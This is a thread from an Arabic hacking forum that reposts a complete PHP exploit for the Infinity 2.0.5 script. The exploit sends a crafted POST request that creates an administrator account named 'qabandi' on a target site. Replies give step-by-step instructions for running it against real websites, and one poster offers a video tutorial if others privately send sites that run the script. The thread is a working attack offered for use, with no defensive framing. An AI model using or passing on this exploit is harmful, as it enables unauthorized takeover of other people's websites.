ثغرة ,,

# milw0rm.com [2009-07-15] اتمنى احد يضع لنا شرح عن كيفية استغلالها ت1

س

سهمـ الشمالـ

New Member
ثغرة ,,
كود: 
       <?phpprint_r('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .
 
                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
[q] Infinity <= 2.0.5 Create Admin __/QQQ/````````````````\QQQ\___
                                 _/QQQQQ/                  \QQQQQQ\
[q] _POST <3                    /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] Owned :)                  |QQQQ/    By  Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[WHAT?]-                \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                         ```````````````````     `````
 ______________________________________________________________________________
/                                                                              \
|       :: Stupid vulnerability in a good script :( tsk tsk                    |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
                                    Sec-Code.com
                                     
 
USAGE: php whatever.php localhost /infinity/
 
 
');
 
ini_set("max_execution_time",0);
 
 function QABANDI($victim,$vic_dir){
$host = $victim;
$p = "http://".$host.$vic_dir;
 
 
 
 
          $data   ="name=qabandi&password=qabandi&conf_password=qabandi&email=Qabandi@was.here&nat=man&hoppy=QabandiWasHere&text=QabandiWasHere&country=1";
          $packet ="POST ".$p."/cp/profile.php?action=donewauthor HTTP/1.0\r\n";
          $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
 
 
 
         //print $packet;
    $o = @fsockopen($host, 80);
    if(!$o){
        echo "\n[x] No response...\n";
        die;
    }
     
    fputs($o, $packet);
    while (!feof($o)) $data .= fread($o, 1024);
    fclose($o);
     
    $_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
    if ( !empty($_404) ){
        echo "\n[x] 404 Not Found... Make sure of path. \n";
        die;
    }
     
        $_401 = strstr( $data, "401 Authorization Required" );
    if ( !empty($_401) ){
        echo "\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n";
        die;
    }
                                           
                                           echo "Admin created !\n\nUsername: qabandi\npassword: qabandi";
 
 }
 
$host1 = $argv[1];
$userdir1=$argv[2];
QABANDI($host1,$userdir1);
 
die;
 
 
?>
 
# milw0rm.com [2009-07-15]

اتمنى احد يضع لنا شرح عن كيفية استغلالها ت1
 
اسم الموضوع : ثغرة ,, | المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات
B

bleu moon

ثغرة ,,
$p = "http://".$host.$vic_dir;

غير هذا باسم الموقع، وقم بنسخ محتوى التغرة وسجله بصيغة .php
 
K

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
ثغرة ,,
انا للاسف ما بقدر اشرحها فيديو لاني ما عندي وقت ابحث عن موقع اطبق لك عليه

لكن طريقه تشغيل الثغره سهله ان شاء الله

اولا الثغره لسكربت اسمو Infinity 2.0.5
اعتقد السكربت هاد منتشر كويس لكن في اصدار اجدد منه هو الاكثر انتشارا ...

المهم
ناخد كود الثغره ونحفظها في امتداد php
بالجهاز الخاص بنا وليكن حفظها على سطح المكتب باسم exploit.php

بعد لازم يكون بجهازنا منصبين السيرفر الشخصي من اجل يكون لدينا مترجم بي اتشبي

وثم
ندخل شاشه الدوز start-->run--->cmd

ثم ندخل لمسار سطح المكتب
cd desktop

بعد نشغل الثغره بالامر التالي
php exploit.php vbspiders.com /infinity/

بتبدل اسم الموقع بالموقع الي مركب السكربت
وكلمه انفتنتي بمسار السكربت

(عارف اني مقصر بالشرح ويلزم توضيح اكثر لكن حاول طبق حبه حبه وان شاء الله رح تفهم )

++
هنا ليس قسم استفساارات الرجاء الانتباه بالمرات القادمه وشكرا
 
K

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</
ثغرة ,,
صحيح انسيت اقولك الثغره تضيف ادمن باسم وباس
qabandi
qabandi

+ لو معاك مواقع مركبه السكربت زتها بالخاص وان اسعفني الوقت خلال اسبوع يكون درسك فيديو صوت وصوره
 
B

bleu moon

ثغرة ,,
ههههههه باين علي مبتدئ هون يا فولكانو !! ليش بهدلتني هههههههههههههههههههههههههههههههههه
 
يجب تسجيل الدخول أو التسجيل كي تتمكن من الرد هنا.
أعلى